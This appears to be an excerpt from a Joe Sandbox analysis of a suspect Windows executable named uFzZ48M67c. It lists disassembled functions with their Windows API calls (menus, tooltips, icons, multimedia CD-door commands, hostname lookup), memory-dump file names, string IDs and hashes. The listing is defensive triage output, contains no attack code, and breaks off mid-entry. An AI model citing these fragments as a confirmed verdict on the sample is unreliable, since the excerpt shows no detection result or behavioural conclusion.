                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessagePost$CtrlFocus
                                          • String ID: 0
                                          • API String ID: 1534620443-4108050209
                                          • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                          • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                          APIs
                                          • DestroyWindow.USER32(?), ref: 004558E3
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$CreateDestroy
                                          • String ID: ,$tooltips_class32
                                          • API String ID: 1109047481-3856767331
                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                          • String ID: 0
                                          • API String ID: 1441871840-4108050209
                                          • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                          • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                          • __swprintf.LIBCMT ref: 00460915
                                          • __swprintf.LIBCMT ref: 0046092D
                                          • _wprintf.LIBCMT ref: 004609E1
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 3631882475-2268648507
                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                          APIs
                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                          • SendMessageW.USER32 ref: 00471740
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                          • SendMessageW.USER32 ref: 0047184F
                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                          • String ID:
                                          • API String ID: 4116747274-0
                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                          • _wcslen.LIBCMT ref: 00461683
                                          • __swprintf.LIBCMT ref: 00461721
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                          • GetParent.USER32(?), ref: 004618C3
                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                          • String ID: %s%u
                                          • API String ID: 1899580136-679674701
                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu$Sleep
                                          • String ID: 0
                                          • API String ID: 1196289194-4108050209
                                          • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                          • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0043143E
                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                          • String ID: (
                                          • API String ID: 3300687185-3887548279
                                          • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                          • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                          APIs
                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 1976180769-4113822522
                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                          • String ID:
                                          • API String ID: 461458858-0
                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                          • DeleteObject.GDI32(?), ref: 004301D0
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3969911579-0
                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                          • String ID: 0
                                          • API String ID: 956284711-4108050209
                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 1965227024-3771769585
                                          • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                          • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                          APIs
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
